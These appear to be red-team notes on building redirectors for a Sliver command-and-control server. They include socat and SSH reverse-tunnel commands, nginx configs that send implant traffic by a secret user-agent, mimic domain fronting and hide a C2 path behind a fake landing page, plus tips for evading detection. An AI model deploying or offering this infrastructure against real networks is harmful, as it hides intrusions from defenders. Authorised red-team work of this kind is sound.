Sliver

C2 Matrix

https://howto.thec2matrix.com/

Redirector and C2 communication setup

Using socat

1. In the redirector: sudo socat tcp-listen:8443,reuseaddr,fork,bind=[redirector IP] tcp:127.0.0.1:4567
2. In the C2: ssh -N -R 4567:localhost:8443 root@[redirector IP]

Using Nginx

1. Ngincx configuration

   ...[snip]...
   
           # Default
       server {
           listen 80 default_server;
   
           charset UTF-8;
   
           error_page 404 /backend-not-found.html;
           location = /backend-not-found.html {
           allow all;
           }
   
           location / {
   
           # Redirection rule
           if ( $http_user_agent ~* 'z.5.x.2.l.8.y.5' ) {
               proxy_pass http://C2_SERVER$request_uri;
           }
           if ( $http_user_agent !~* 'z.5.x.2.l.8.y.5' ) {
               proxy_pass http://FAKE_WEBSITE$request_uri;
           }
   
   ...[snip]...
   

2. Nginx v.2

   NGINX Config – /etc/nginx/sites-available/c2-redirector

   server {
       listen 443 ssl;
       server_name c2.domain.com;
   
       ssl_certificate /etc/ssl/certs/fullchain.pem;
       ssl_certificate_key /etc/ssl/private/privkey.pem;
   
       location / {
           proxy_pass http://<C2_SERVER_IP>:80;
           proxy_http_version 1.1;
           proxy_set_header Host $host;
           proxy_set_header X-Real-IP $remote_addr;
           proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
           proxy_set_header Upgrade $http_upgrade;
           proxy_set_header Connection "upgrade";
       }
   }
   

   Enable and Reload

   ln -s /etc/nginx/sites-available/c2-redirector /etc/nginx/sites-enabled/
   nginx -t && systemctl reload nginx
   

3. Example 1: Domain Fronting Style Redirect (via Host header filtering)

   NGINX Config: Fronting with Header Filtering

   server {
       listen 443 ssl;
       server_name cdn.example.com;
   
       ssl_certificate /etc/ssl/certs/fullchain.pem;
       ssl_certificate_key /etc/ssl/private/privkey.pem;
   
       location / {
           if ($http_host != "cdn.example.com") {
               return 444; # drop connection silently
           }
   
           proxy_pass http://<C2_SERVER_IP>:80;
           proxy_http_version 1.1;
           proxy_set_header Host $http_host;
           proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
           proxy_set_header X-Real-IP $remote_addr;
       }
   }
   

   Note: While full domain fronting is no longer supported by AWS and Google, this setup can emulate it by relying on controlled Host headers from implants or staging.

4. Example 2: Split Redirector (Static + C2 Routing) NGINX Config: Decoy + Secret Path

   server {
       listen 443 ssl;
       server_name update.mydomain.net;
   
       ssl_certificate /etc/ssl/certs/fullchain.pem;
       ssl_certificate_key /etc/ssl/private/privkey.pem;
   
       location = / {
           root /var/www/html/;
           index index.html;
       }
   
       location /blog-update {
           proxy_pass http://<C2_SERVER_IP>:80;
           proxy_http_version 1.1;
           proxy_set_header Host $host;
           proxy_set_header X-Real-IP $remote_addr;
           proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
       }
   }
   

   You can now embed the implant to connect to https://update.mydomain.net/blog-update, while casual visitors see a static fake landing page.

OpSec tips for nginx redirectors

• Use Let’s Encrypt (certbot) to generate TLS certs easily.
• Block all ports except 443 with iptables or ufw.
• Enable fail2ban to block brute force or scanning attempts.
• Monitor access.log and error.log for detection.